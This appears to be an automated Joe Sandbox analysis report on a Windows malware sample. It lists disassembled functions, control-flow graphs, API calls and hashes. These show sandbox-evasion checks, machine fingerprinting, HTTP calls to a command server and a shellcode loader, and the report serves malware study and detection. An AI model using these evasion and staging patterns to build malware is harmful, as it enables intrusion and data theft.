                                            control_flow_graph 1058 4119f0-411a1d call 41ade0 StrCmpCA 1061 411a27-411a41 call 41ade0 strtok_s 1058->1061 1062 411a1f-411a21 ExitProcess 1058->1062 1065 411a44-411a48 1061->1065 1066 411c12-411c1d call 41ab10 1065->1066 1067 411a4e-411a61 1065->1067 1068 411a67-411a6a 1067->1068 1069 411bee-411c0d strtok_s 1067->1069 1071 411b41-411b52 StrCmpCA 1068->1071 1072 411ba1-411bb2 StrCmpCA 1068->1072 1073 411bc0-411bd1 StrCmpCA 1068->1073 1074 411b63-411b74 StrCmpCA 1068->1074 1075 411b82-411b93 StrCmpCA 1068->1075 1076 411a85-411a94 call 41ab30 1068->1076 1077 411aad-411abe StrCmpCA 1068->1077 1078 411acf-411ae0 StrCmpCA 1068->1078 1079 411a71-411a80 call 41ab30 1068->1079 1080 411a99-411aa8 call 41ab30 1068->1080 1081 411afd-411b0e StrCmpCA 1068->1081 1082 411b1f-411b30 StrCmpCA 1068->1082 1083 411bdf-411be9 call 41ab30 1068->1083 1069->1065 1089 411b54-411b57 1071->1089 1090 411b5e 1071->1090 1095 411bb4-411bb7 1072->1095 1096 411bbe 1072->1096 1098 411bd3-411bd6 1073->1098 1099 411bdd 1073->1099 1091 411b80 1074->1091 1092 411b76-411b79 1074->1092 1093 411b95-411b98 1075->1093 1094 411b9f 1075->1094 1076->1069 1103 411ac0-411ac3 1077->1103 1104 411aca 1077->1104 1105 411ae2-411aec 1078->1105 1106 411aee-411af1 1078->1106 1079->1069 1080->1069 1085 411b10-411b13 1081->1085 1086 411b1a 1081->1086 1087 411b32-411b35 1082->1087 1088 411b3c 1082->1088 1083->1069 1085->1086 1086->1069 1087->1088 1088->1069 1089->1090 1090->1069 1091->1069 1092->1091 1093->1094 1094->1069 1095->1096 1096->1069 1098->1099 1099->1069 1103->1104 1104->1069 1107 411af8 1105->1107 1106->1107 1107->1069
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID: block
                                            • API String ID: 3407564107-2199623458
                                            • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                            • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                            • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                            • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                            Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1111 415760-4157c7 call 415d20 call 41ab30 * 3 call 41aa50 * 4 1127 4157cc-4157d3 1111->1127 1128 4157d5-415806 call 41ab30 call 41aab0 call 401590 call 415440 1127->1128 1129 415827-41589c call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1127->1129 1145 41580b-415822 call 41abb0 call 41ab10 1128->1145 1155 4158e3-4158f9 call 41ade0 StrCmpCA 1129->1155 1159 41589e-4158de call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1129->1159 1145->1155 1160 415a2c-415a94 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1155->1160 1161 4158ff-415906 1155->1161 1159->1155 1291 415d13-415d16 1160->1291 1165 415a2a-415aaf call 41ade0 StrCmpCA 1161->1165 1166 41590c-415913 1161->1166 1185 415be1-415c49 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1165->1185 1186 415ab5-415abc 1165->1186 1170 415915-415969 call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1166->1170 1171 41596e-4159e3 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1166->1171 1170->1165 1171->1165 1271 4159e5-415a25 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1171->1271 1185->1291 1192 415ac2-415ac9 1186->1192 1193 415bdf-415c64 call 41ade0 StrCmpCA 1186->1193 1200 415b23-415b98 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1192->1200 1201 415acb-415b1e call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1192->1201 1222 415c66-415c71 Sleep 1193->1222 1223 415c78-415ce1 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1193->1223 1200->1193 1296 415b9a-415bda call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1200->1296 1201->1193 1222->1127 1223->1291 1271->1165 1296->1193
                                            APIs
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                              • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                              • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                            • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3630751533-2791005934
                                            • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                            • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                            • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                            • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A
                                            Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1322 417690-4176da GetWindowsDirectoryA 1323 4176e3-417757 GetVolumeInformationA call 418e90 * 3 1322->1323 1324 4176dc 1322->1324 1331 417768-41776f 1323->1331 1324->1323 1332 417771-41778a call 418e90 1331->1332 1333 41778c-4177a7 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 4177a9-4177b6 call 41aa50 1333->1335 1336 4177b8-4177e8 wsprintfA call 41aa50 1333->1336 1343 41780e-41781e 1335->1343 1336->1343
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                            • wsprintfA.USER32 ref: 004177D0
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 3790021787-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9
                                            Function 0245003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1344 245003c-2450047 1345 245004c-2450263 call 2450a3f call 2450e0f call 2450d90 VirtualAlloc 1344->1345 1346 2450049 1344->1346 1361 2450265-2450289 call 2450a69 1345->1361 1362 245028b-2450292 1345->1362 1346->1345 1367 24502ce-24503c2 VirtualProtect call 2450cce call 2450ce7 1361->1367 1364 24502a1-24502b0 1362->1364 1366 24502b2-24502cc 1364->1366 1364->1367 1366->1364 1373 24503d1-24503e0 1367->1373 1374 24503e2-2450437 call 2450ce7 1373->1374 1375 2450439-24504b8 VirtualFree 1373->1375 1374->1373 1376 24505f4-24505fe 1375->1376 1377 24504be-24504cd 1375->1377 1381 2450604-245060d 1376->1381 1382 245077f-2450789 1376->1382 1380 24504d3-24504dd 1377->1380 1380->1376 1386 24504e3-2450505 LoadLibraryA 1380->1386 1381->1382 1387 2450613-2450637 1381->1387 1384 24507a6-24507b0 1382->1384 1385 245078b-24507a3 1382->1385 1388 24507b6-24507cb 1384->1388 1389 245086e-24508be LoadLibraryA 1384->1389 1385->1384 1390 2450517-2450520 1386->1390 1391 2450507-2450515 1386->1391 1392 245063e-2450648 1387->1392 1393 24507d2-24507d5 1388->1393 1396 24508c7-24508f9 1389->1396 1394 2450526-2450547 1390->1394 1391->1394 1392->1382 1395 245064e-245065a 1392->1395 1397 2450824-2450833 1393->1397 1398 24507d7-24507e0 1393->1398 1399 245054d-2450550 1394->1399 1395->1382 1400 2450660-245066a 1395->1400 1401 2450902-245091d 1396->1401 1402 24508fb-2450901 1396->1402 1408 2450839-245083c 1397->1408 1403 24507e4-2450822 1398->1403 1404 24507e2 1398->1404 1405 2450556-245056b 1399->1405 1406 24505e0-24505ef 1399->1406 1407 245067a-2450689 1400->1407 1402->1401 1403->1393 1404->1397 1409 245056d 1405->1409 1410 245056f-245057a 1405->1410 1406->1380 1411 2450750-245077a 1407->1411 1412 245068f-24506b2 1407->1412 1408->1389 1413 245083e-2450847 1408->1413 1409->1406 1415 245057c-2450599 1410->1415 1416 245059b-24505bb 1410->1416 1411->1392 1417 24506b4-24506ed 1412->1417 1418 24506ef-24506fc 1412->1418 1419 2450849 1413->1419 1420 245084b-245086c 1413->1420 1427 24505bd-24505db 1415->1427 1416->1427 1417->1418 1421 24506fe-2450748 1418->1421 1422 245074b 1418->1422 1419->1389 1420->1408 1421->1422 1422->1407 1427->1399
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0245024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: c9fbaced24b664d85f2f51353405923b56babc5c95e3065eb613141c6d6e0ca0
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 3D525D75A01229DFDB64CF58C985BADBBB1BF09304F1480DAE94DA7352DB30AA85CF14
                                            Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2798), ref: 00419BF1
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C27C8), ref: 00419C0A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A20), ref: 00419C22
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A08), ref: 00419C3A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2990), ref: 00419C53
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C93C0), ref: 00419C6B
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C61B8), ref: 00419C83
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C6258), ref: 00419C9C
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A38), ref: 00419CB4
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C2A50), ref: 00419CCC
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29A8), ref: 00419CE5
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29C0), ref: 00419CFD
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C6418), ref: 00419D15
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,009C29D8), ref: 00419D2E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                              • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                            • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 3511611419-0
                                            • Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                            • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                            • Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
                                            • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                            Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                            • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                            • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                            • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                            Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1493 401220-401247 call 418b40 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41dd30 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • __aulldiv.LIBCMT ref: 00401258
                                            • __aulldiv.LIBCMT ref: 00401266
                                            • ExitProcess.KERNEL32 ref: 00401294
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                            Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 416d93 1508 416daa 1507->1508 1510 416d5a-416d77 call 41ade0 OpenEventA 1508->1510 1511 416dac-416dc2 call 416bc0 call 415d60 CloseHandle ExitProcess 1508->1511 1516 416d95-416da4 CloseHandle Sleep 1510->1516 1517 416d79-416d91 call 41ade0 CreateEventA 1510->1517 1516->1508 1517->1511
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,009C9490,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                            • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                            Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
